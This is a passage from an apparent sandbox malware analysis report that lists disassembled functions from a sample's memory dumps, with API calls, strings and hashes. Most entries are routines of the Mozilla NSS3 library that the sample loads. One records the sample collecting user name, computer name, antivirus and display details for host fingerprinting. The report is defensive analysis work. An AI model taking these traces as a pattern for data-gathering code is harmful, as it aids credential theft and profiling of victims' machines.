Part of subcall function 6C4410C0: PL_ArenaAllocate.NSS3(?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C44116E

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C508FE0,00000000), ref: 6C3E6E82

Part of subcall function 6C3E6AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C3EB21D,00000000,00000000,6C3EB219,?,6C3E6BFB,00000000,?,00000000,00000000,?,?,?,6C3EB21D), ref: 6C3E6B01
Part of subcall function 6C3E6AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C3E6B8A

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C3E6F1E
PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C3E6F35
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C508FE0,00000000), ref: 6C3E6F6B
PR_SetError.NSS3(FFFFE005,00000000,6C3E7D8F,?,?), ref: 6C3E6FE1

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 587344769-0
Opcode ID: cc91539619871a20943fc89dfec188fff4844cfa6f23bfea51c50cd8dcc01f88
Instruction ID: 22057be9ebd8a756506d815de541e169e71c38eb8b87329cbae30f83f64cf776
Opcode Fuzzy Hash: cc91539619871a20943fc89dfec188fff4844cfa6f23bfea51c50cd8dcc01f88
Instruction Fuzzy Hash: 9D718071D1065A9BEB00CF15CD40FAA77B9BF98308F15422AE908D7B11F771EA95CB90

Function 6C42ADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6C40CDBB,?,6C40D079,00000000,00000001), ref: 6C42AE10
EnterCriticalSection.KERNEL32(?,?,6C40CDBB,?,6C40D079,00000000,00000001), ref: 6C42AE24
PR_Unlock.NSS3(?,?,?,?,?,?,6C40D079,00000000,00000001), ref: 6C42AE5A
memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C40CDBB,?,6C40D079,00000000,00000001), ref: 6C42AE6F
free.MOZGLUE(85145F8B,?,?,?,?,6C40CDBB,?,6C40D079,00000000,00000001), ref: 6C42AE7F
TlsGetValue.KERNEL32(?,6C40CDBB,?,6C40D079,00000000,00000001), ref: 6C42AEB1
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C40CDBB,?,6C40D079,00000000,00000001), ref: 6C42AEC9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C40CDBB,?,6C40D079,00000000,00000001), ref: 6C42AEF1
free.MOZGLUE(6C40CDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6C40CDBB,?), ref: 6C42AF0B
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C40CDBB,?,6C40D079,00000000,00000001), ref: 6C42AF30

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValuefree$memset
String ID:
API String ID: 161582014-0
Opcode ID: ae2ec61b0de1be96508c55afa08b680361492f909d0b974aa16cf96ab27bc257
Instruction ID: ecc4200bf7f9411553cf31a8daf8fa0f38c4cf730debc89a8a11eff8914b1e6b
Opcode Fuzzy Hash: ae2ec61b0de1be96508c55afa08b680361492f909d0b974aa16cf96ab27bc257
Instruction Fuzzy Hash: ED5199B1A01602AFDB10DF25D886F5AB7B4BF04319F154268EC189BB11E739F865CBD1

Function 6C404CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,?,6C40AB7F,?,00000000,?), ref: 6C404CB4
EnterCriticalSection.KERNEL32(0000001C,?,6C40AB7F,?,00000000,?), ref: 6C404CC8
TlsGetValue.KERNEL32(?,6C40AB7F,?,00000000,?), ref: 6C404CE0
EnterCriticalSection.KERNEL32(?,?,6C40AB7F,?,00000000,?), ref: 6C404CF4
PL_HashTableLookup.NSS3(?,?,?,6C40AB7F,?,00000000,?), ref: 6C404D03
PR_Unlock.NSS3(?,00000000,?), ref: 6C404D10

Part of subcall function 6C48DD70: TlsGetValue.KERNEL32 ref: 6C48DD8C
Part of subcall function 6C48DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C48DDB4

PR_Now.NSS3(?,00000000,?), ref: 6C404D26

Part of subcall function 6C4A9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C4F0A27), ref: 6C4A9DC6
Part of subcall function 6C4A9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C4F0A27), ref: 6C4A9DD1
Part of subcall function 6C4A9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C4A9DED

PR_Unlock.NSS3(?,?,00000000,?), ref: 6C404D98
PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C404DDA
PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C404E02

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 4032354334-0
Opcode ID: db3ee9097c532cdf30cb6fd6825a84ec5748a555506788ce21930a733e43ee8b
Instruction ID: 580383a9322b869964673ccb1153ac0b4460ae643c70db43bb1b2b444f90238e
Opcode Fuzzy Hash: db3ee9097c532cdf30cb6fd6825a84ec5748a555506788ce21930a733e43ee8b
Instruction Fuzzy Hash: 5641B7B6A402059BEB01EF24EC40D5A77B8BF2525DF054571EC1887B12FB31E965CBE2

Function 6C3CFC50 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C3CFD18
sqlite3_initialize.NSS3 ref: 6C3CFD5F
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C3CFD89
memcpy.VCRUNTIME140(00000000,00000000,?), ref: 6C3CFD99
sqlite3_free.NSS3(00000000), ref: 6C3CFE3C
sqlite3_free.NSS3(?), ref: 6C3CFEE3
sqlite3_free.NSS3(?), ref: 6C3CFEEE

Strings

simple, xrefs: 6C3CFC79

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: sqlite3_free$sqlite3_initialize$memcpymemset
String ID: simple
API String ID: 1130978851-3246079234
Opcode ID: d8d863bfa59eba6cbcc886d06140f0cc661018ebb73cf9ab659f6c58e2ace6c5
Instruction ID: e1231e67819aae9f5d69d3e4997ba02d2992e1f5a74d133b7facd02707aee80c
Opcode Fuzzy Hash: d8d863bfa59eba6cbcc886d06140f0cc661018ebb73cf9ab659f6c58e2ace6c5
Instruction Fuzzy Hash: 76913BB0B012058FDB04DF65C884AAEB7B1FF89318F258169D8199BB56E731EC41CF92

Function 6C3D5CE0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 229COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C3D5EC9
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000296F7,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C3D5EED

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C3D5ED1
misuse, xrefs: 6C3D5EDB
invalid, xrefs: 6C3D5EBE
%s at line %d of [%.10s], xrefs: 6C3D5EE0
API call with %s database connection pointer, xrefs: 6C3D5EC3
unable to close due to unfinalized statements or unfinished backups, xrefs: 6C3D5E64

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
API String ID: 632333372-1982981357
Opcode ID: a2e202ac17deaa5c4b17b165aaf2dae6755e42133a95cbcf5a3a0419f15d1c77
Instruction ID: e397162cd62239258d1591d55aa5d21a3ac10d8f907c00c34400c681e621cc07
Opcode Fuzzy Hash: a2e202ac17deaa5c4b17b165aaf2dae6755e42133a95cbcf5a3a0419f15d1c77
Instruction Fuzzy Hash: 2081B1B2B056029BEB19DF25C848BAA7374FF4130CF164259D8555BB51D732F842CFA2

Function 6C3BDCC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 225COMMON

Download Yara Rule

APIs

_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C3BDDF9
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00012806,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C3BDE68
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001280D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C3BDE97
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C3BDEB6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C3BDF78

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C3BDE52, 6C3BDE81
database corruption, xrefs: 6C3BDE5C, 6C3BDE8B
%s at line %d of [%.10s], xrefs: 6C3BDE61, 6C3BDE90

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1526119172-598938438
Opcode ID: a1a1aebe58ee78687319c9a548d8e260551dd90538fd4f0d5ec6a2742bf5c968
Instruction ID: 96261219a189c548c7f84b94ca809a0014eb7fa35a84b0cc0b0a9c1c2d66d54a
Opcode Fuzzy Hash: a1a1aebe58ee78687319c9a548d8e260551dd90538fd4f0d5ec6a2742bf5c968
Instruction Fuzzy Hash: 7481CF716083009FD714DF25C880B6A77F1AFA5308F14882DE99A9BE95E736E845CF92

Function 6C444DF0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 184memoryCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6C44536F,00000022,?,?,00000000,?), ref: 6C444E70
PORT_ZAlloc_Util.NSS3(00000000), ref: 6C444F28
PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6C444F8E
PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6C444FAE
free.MOZGLUE(?), ref: 6C444FC8

Strings

%s=%s, xrefs: 6C444F89
%s=%c%s%c, xrefs: 6C444FA9
oSDl", xrefs: 6C444DFB, 6C444EF4, 6C444EC5

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: R_smprintf$Alloc_Utilfreeisspace
String ID: %s=%c%s%c$%s=%s$oSDl"
API String ID: 2709355791-1470493768
Opcode ID: 1be258c8c95ca98cd85bd4b63ae48063ba7c78f952ebd1aad5289784af6bbbe4
Instruction ID: fba0d007aa6fc29c30e4712bbe2d1d009f96ca3714d75820a6a55ba11b00af24
Opcode Fuzzy Hash: 1be258c8c95ca98cd85bd4b63ae48063ba7c78f952ebd1aad5289784af6bbbe4
Instruction Fuzzy Hash: E2513871A041558BFB01CE698890FFFBBF5DF4238AF38D125E894A7B41D33598068791

Function 006311C2 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77COMMON

Download Yara Rule

APIs

UnDecorator::getArgumentList.LIBCMT ref: 006311E7

Part of subcall function 00630D82: Replicator::operator[].LIBCMT ref: 00630E05
Part of subcall function 00630D82: DName::operator+=.LIBCMT ref: 00630E0D

DName::operator+.LIBCMT ref: 00631240
DName::DName.LIBCMT ref: 00631298

Strings

void, xrefs: 00631290
,<ellipsis>, xrefs: 00631233
<ellipsis>, xrefs: 00631282
,..., xrefs: 0063122C, 00631238
..., xrefs: 0063127B, 00631287

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
String ID: ,...$,<ellipsis>$...$<ellipsis>$void
API String ID: 834187326-2211150622
Opcode ID: a01238eb4193c6deb48355475f4e6dcc479eca5b4b62e4ee2c1371df5dc4e275
Instruction ID: e29fc44fc64fab2ce7da6a579cb192f2250007c7ae569e0b0988c1cca27cfdbf
Opcode Fuzzy Hash: a01238eb4193c6deb48355475f4e6dcc479eca5b4b62e4ee2c1371df5dc4e275
Instruction Fuzzy Hash: B02150342006049FCB15CF6CD895BA57BF6FB4638AF049099E945DF362CB31DA46CB80

Function 6C41ACC0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6C41ACE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C41AD14
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C41AD23

Part of subcall function 6C4FD930: PL_strncpyz.NSS3(?,?,?), ref: 6C4FD963

PR_LogPrint.NSS3(?,00000000), ref: 6C41AD39

Strings

nOl, xrefs: 6C41AD51, 6C41AD7B
C_MessageDecryptFinal, xrefs: 6C41ACE1
(CK_INVALID_HANDLE), xrefs: 6C41AD1C
hSession = 0x%x, xrefs: 6C41ACFE, 6C41AD0E

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal$nOl
API String ID: 332880674-490655861
Opcode ID: b95998e26a499213c75c8ae560a827b91744215bf6029b217ccb85183d2fa712
Instruction ID: fe24cf01ad7eefbbe3ea82e2d7af0c2d94ea17c6d15f6f8e7ccc19b5bf027874
Opcode Fuzzy Hash: b95998e26a499213c75c8ae560a827b91744215bf6029b217ccb85183d2fa712
Instruction Fuzzy Hash: BB21D0717051149BDB00EB64DD88F7A37B6EF8270EF068429E849DBF11EB24980DCAD6

Function 00632B5B Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

UnDecorator::UScore.LIBCMT ref: 00632B65
DName::DName.LIBCMT ref: 00632B71

Part of subcall function 0063083C: DName::doPchar.LIBCMT ref: 0063086D

UnDecorator::getScopedName.LIBCMT ref: 00632BB0
DName::operator+=.LIBCMT ref: 00632BBA
DName::operator+=.LIBCMT ref: 00632BC9
DName::operator+=.LIBCMT ref: 00632BD5
DName::operator+=.LIBCMT ref: 00632BE2

Strings

void, xrefs: 00632BC1

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
String ID: void
API String ID: 1480779885-3531332078
Opcode ID: 94f9953c5f336e6bc00e5510eb021da33aa54fde609a179abae1ef4a10203161
Instruction ID: dd5fc65fe16872f7badb2aa33452693926980dacd9aaff5751baa6cd192ad562
Opcode Fuzzy Hash: 94f9953c5f336e6bc00e5510eb021da33aa54fde609a179abae1ef4a10203161
Instruction Fuzzy Hash: FD118671900209AFD759EF68C866BE9BBB6EF11305F044098E4079B2E2DB70AA45CBD4

Function 006231BF Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 006231D1
GetDeviceCaps.GDI32(00000000,00000008), ref: 006231DC
GetDeviceCaps.GDI32(00000000,0000000A), ref: 006231E7
ReleaseDC.USER32(00000000,00000000), ref: 006231F2
GetProcessHeap.KERNEL32(00000000,00000104,?,?,00625DD5,?,Display Resolution: ,00647934,00000000,User Name: ,00647924,00000000,Computer Name: ,00647910,AV: ,00647904), ref: 006231FE
HeapAlloc.KERNEL32(00000000,?,?,00625DD5,?,Display Resolution: ,00647934,00000000,User Name: ,00647924,00000000,Computer Name: ,00647910,AV: ,00647904,Install Date: ), ref: 00623205
wsprintfA.USER32 ref: 00623217

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

Strings

%dx%d, xrefs: 00623211

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
String ID: %dx%d
API String ID: 3940144428-2206825331
Opcode ID: 48b0c2b1f3bd4c0921b1b34c607157c5f02e88bf5415e025981c86e7137e1f5c
Instruction ID: e2086b7789a9be4663c79b7ee5051afb5917f17eafe3bfa80421cbf62711e0d4
Opcode Fuzzy Hash: 48b0c2b1f3bd4c0921b1b34c607157c5f02e88bf5415e025981c86e7137e1f5c
Instruction Fuzzy Hash: 09F04F72641720BBDB116BA5AC4DDAB7E6CFF47BA6B000055F705D2160DAB85D00C7E1

Function 6C42CC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,00000100,?), ref: 6C42CD08
PK11_DoesMechanism.NSS3(?,?), ref: 6C42CE16
PR_SetError.NSS3(00000000,00000000), ref: 6C42D079

Part of subcall function 6C48C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C48C2BF

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: DoesErrorK11_MechanismValuememcpy
String ID:
API String ID: 1351604052-0
Opcode ID: 095df4f210ff582f228a4c4b7404b189bda3f596105ab68674b7c2ac99b1916c
Instruction ID: 577a33eaaf5ff7089c322f29e6d14b3d929d88aa13eb2980bde58dc97a9acd0c
Opcode Fuzzy Hash: 095df4f210ff582f228a4c4b7404b189bda3f596105ab68674b7c2ac99b1916c
Instruction Fuzzy Hash: 2AC16DB1A002199BEB20DF24CC81FDAB7B4AF48318F1541A8D948A7751E779EE95CFD0

Function 6C41DC60 Relevance: 13.7, APIs: 9, Instructions: 245memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,6C4297C1,?,00000000,00000000,?,?,?,00000000,?,6C407F4A,00000000), ref: 6C41DC68

